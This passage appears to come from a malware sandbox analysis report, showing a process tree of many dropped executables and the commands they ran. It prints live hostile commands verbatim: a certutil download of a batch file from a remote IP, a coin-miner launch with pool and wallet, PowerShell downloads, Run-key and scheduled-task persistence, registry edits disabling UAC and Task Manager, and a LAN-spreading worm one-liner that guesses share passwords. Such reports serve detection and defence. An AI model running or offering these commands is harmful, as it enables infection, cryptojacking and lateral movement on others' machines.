      PID:7056
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\pinguin.exe"
  2⤵
  PID:5532
- - C:\Users\Admin\AppData\Local\Temp\a\pinguin.exe
    C:\Users\Admin\AppData\Local\Temp\a\pinguin.exe
    3⤵
    PID:5304
- - C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
    C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
    3⤵
    PID:7388
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      PID:6832
    - - C:\Windows\System32\certutil.exe
        
        C:\Windows\System32\certutil.exe
        5⤵
        
        PID:8364
      - C:\Windows\explorer.exe
        
        explorer.exe
        6⤵
        
        PID:4460
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  PID:8708
- - C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    3⤵
    PID:6464
- - C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
    C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
    3⤵
    PID:5360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      PID:5332
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
        5⤵
        
        PID:8736
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\sc.exe"
  2⤵
  PID:7680
- - C:\Users\Admin\AppData\Local\Temp\a\sc.exe
    C:\Users\Admin\AppData\Local\Temp\a\sc.exe
    3⤵
    - Launches sc.exe
    PID:8616
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\vi.exe"
  2⤵
  PID:8132
- - C:\Users\Admin\AppData\Local\Temp\a\vi.exe
    C:\Users\Admin\AppData\Local\Temp\a\vi.exe
    3⤵
    PID:6520
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 1688
      4⤵
      Program crash
      PID:4692
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\hv.exe"
  2⤵
  PID:7060
- - C:\Users\Admin\AppData\Local\Temp\a\hv.exe
    C:\Users\Admin\AppData\Local\Temp\a\hv.exe
    3⤵
    PID:4792
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      PID:8740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
      4⤵
      PID:6960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 1192
      4⤵
      Program crash
      PID:6152
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\cp.exe"
  2⤵
  PID:8280
- - C:\Users\Admin\AppData\Local\Temp\a\cp.exe
    C:\Users\Admin\AppData\Local\Temp\a\cp.exe
    3⤵
    PID:2032
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\ma.exe"
  2⤵
  PID:8896
- - C:\Users\Admin\AppData\Local\Temp\a\ma.exe
    C:\Users\Admin\AppData\Local\Temp\a\ma.exe
    3⤵
    PID:8472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE49A.tmp.bat""
      4⤵
      PID:5528
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:7584
    - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:2732
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        
        PID:6492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        7⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5312
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        6⤵
        
        PID:7708
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\ama.exe"
  2⤵
  PID:6836
- - C:\Users\Admin\AppData\Local\Temp\a\ama.exe
    C:\Users\Admin\AppData\Local\Temp\a\ama.exe
    3⤵
    PID:9056
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE"
      4⤵
      PID:6860
    - - C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        5⤵
        
        PID:8660
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE"
        6⤵
        
        PID:8424
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        7⤵
        
        PID:8860
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE"
        8⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        9⤵
        
        PID:5964
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE"
        10⤵
        
        PID:8168
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        11⤵
        
        PID:6552
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE"
        12⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\ONE_DR~1\MSICEN~1.EXE
        13⤵
        
        PID:4368
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\J8YHIY~1.EXE"
  2⤵
  PID:5036
- - C:\Users\Admin\AppData\Local\Temp\a\J8YHIY~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\J8YHIY~1.EXE
    3⤵
    PID:8904
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
      PID:6636
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"
  2⤵
  PID:5956
- - C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe
    C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe
    3⤵
    PID:6260
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      PID:1976
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        
        PID:7028
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        6⤵
        Kills process with taskkill
        
        PID:5144
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      PID:6996
    - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tftp.exe
        5⤵
        
        PID:6736
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      PID:9160
    - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        
        C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        5⤵
        
        PID:6904
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        6⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im tftp.exe & tskill tftp.exe
        7⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        8⤵
        Kills process with taskkill
        
        PID:6864
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        6⤵
        
        PID:4920
        
        C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tftp.exe
        7⤵
        
        PID:8228
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        6⤵
        
        PID:7488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v /d C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe /t REG_SZ
        7⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v /d C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe /t REG_SZ
        8⤵
        Modifies registry key
        
        PID:7584
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn UAC /SC ONLOGON /F /RL HIGHEST /TR C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        7⤵
        
        PID:7964
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn UAC /SC ONLOGON /F /RL HIGHEST /TR C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4388
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        
        PID:2236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn UAC /RU SYSTEM /SC ONLOGON /F /V1 /RL HIGHEST /TR C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        7⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn UAC /RU SYSTEM /SC ONLOGON /F /V1 /RL HIGHEST /TR C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4692
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        6⤵
        Power Settings
        
        PID:6016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        7⤵
        Power Settings
        
        PID:7304
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        8⤵
        Power Settings
        
        PID:8096
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        8⤵
        Power Settings
        
        PID:6044
        
        C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        8⤵
        Power Settings
        
        PID:6580
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1903& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
        6⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /v:on /c @(for /f usebackq tokens=1 %i in (`@net view^|find /i \\ ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f usebackq tokens=1* delims== %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1903& @if not !s!"=="%COMPUTERNAME% @echo connect to \\!s! & (for /f usebackq tokens=1 %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe \\!s!\%j\!f! 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! ) do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not %p%u"=="01 net use %c %p /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" %c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f! %c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f! %c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f! %c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f! %c\Documents and Settings\%u\Start Menu\Programs\Startup\!f! %c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f! %c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f! %c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f! %c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f! %c\Windows\All Users\Start menu\Programs\Startup\!f! %c\%u\!f! ) do @echo f|@xcopy /y /d C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
        7⤵
        
        PID:7208
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\FXYE6U~1.EXE"
  2⤵
  PID:2728
- - C:\Users\Admin\AppData\Local\Temp\a\FXYE6U~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\FXYE6U~1.EXE
    3⤵
    PID:7224
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
      PID:8104
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\XCDAXF~1.EXE"
  2⤵
  PID:2460
- - C:\Users\Admin\AppData\Local\Temp\a\XCDAXF~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\XCDAXF~1.EXE
    3⤵
    PID:2560
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:6428
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\INSTAL~1.EXE"
  2⤵
  PID:9000
- - C:\Users\Admin\AppData\Local\Temp\a\INSTAL~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\INSTAL~1.EXE
    3⤵
    PID:1584
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c ins.bat
      4⤵
      PID:6908
    - - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5400
    - - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8480
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
        6⤵
        
        PID:5508
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8140
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
        7⤵
        Modifies registry key
        
        PID:2164
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5264
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2928
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\200.exe"
  2⤵
  PID:5528
- - C:\Users\Admin\AppData\Local\Temp\a\200.exe
    C:\Users\Admin\AppData\Local\Temp\a\200.exe
    3⤵
    PID:6372
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\UMOKKI~1.EXE"
  2⤵
  PID:988
- - C:\Users\Admin\AppData\Local\Temp\a\UMOKKI~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\UMOKKI~1.EXE
    3⤵
    PID:7120
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
      PID:5324
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\AV_DOW~1.EXE"
  2⤵
  PID:8200
- - C:\Users\Admin\AppData\Local\Temp\a\AV_DOW~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\AV_DOW~1.EXE
    3⤵
    PID:8984
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D2E.tmp\6D2F.tmp\6D30.bat C:\Users\Admin\AppData\Local\Temp\a\AV_DOW~1.EXE"
      4⤵
      PID:6188
    - - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\a\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
        5⤵
        Access Token Manipulation: Create Process with Token
        
        PID:5624
      - C:\Users\Admin\AppData\Local\Temp\a\AV_DOW~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\a\AV_DOW~1.EXE" goto :target
        6⤵
        
        PID:1008
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AEAB.tmp\AEAC.tmp\AF69.bat C:\Users\Admin\AppData\Local\Temp\a\AV_DOW~1.EXE goto :target"
        7⤵
        
        PID:7896
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        8⤵
        
        PID:8472
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        8⤵
        
        PID:5068
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        8⤵
        
        PID:6080
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h e:\net
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2864
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat
        8⤵
        
        PID:8476
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache * delete
        8⤵
        
        PID:6900
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5836
        
        C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 100
        8⤵
        Delays execution with timeout.exe
        
        PID:9008
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\PORNHU~1.EXE"
  2⤵
  PID:2060
- - C:\Users\Admin\AppData\Local\Temp\a\PORNHU~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\PORNHU~1.EXE
    3⤵
    PID:2076
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B97.tmp\6B98.tmp\6B99.bat C:\Users\Admin\AppData\Local\Temp\a\PORNHU~1.EXE"
      4⤵
      PID:8196
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\sysnative\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\6B97.tmp\6B98.tmp\6B99.bat C:\Users\Admin\AppData\Local\Temp\a\PORNHU~1.EXE
        5⤵
        
        PID:7468
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\288C47~1.EXE"
  2⤵
  PID:236
- - C:\Users\Admin\AppData\Local\Temp\a\288C47~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\288C47~1.EXE
    3⤵
    PID:8100
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ISetup4.exe"
      4⤵
      PID:4588
    - - C:\Users\Admin\AppData\Local\Temp\ISetup4.exe
        
        C:\Users\Admin\AppData\Local\Temp\ISetup4.exe
        5⤵
        
        PID:5144
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 456
        6⤵
        Program crash
        
        PID:8836
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
      4⤵
      PID:7640
    - - C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        5⤵
        
        PID:4608
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
        6⤵
        
        PID:6260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8344
        
        C:\Windows\system32\cmd.exe
        
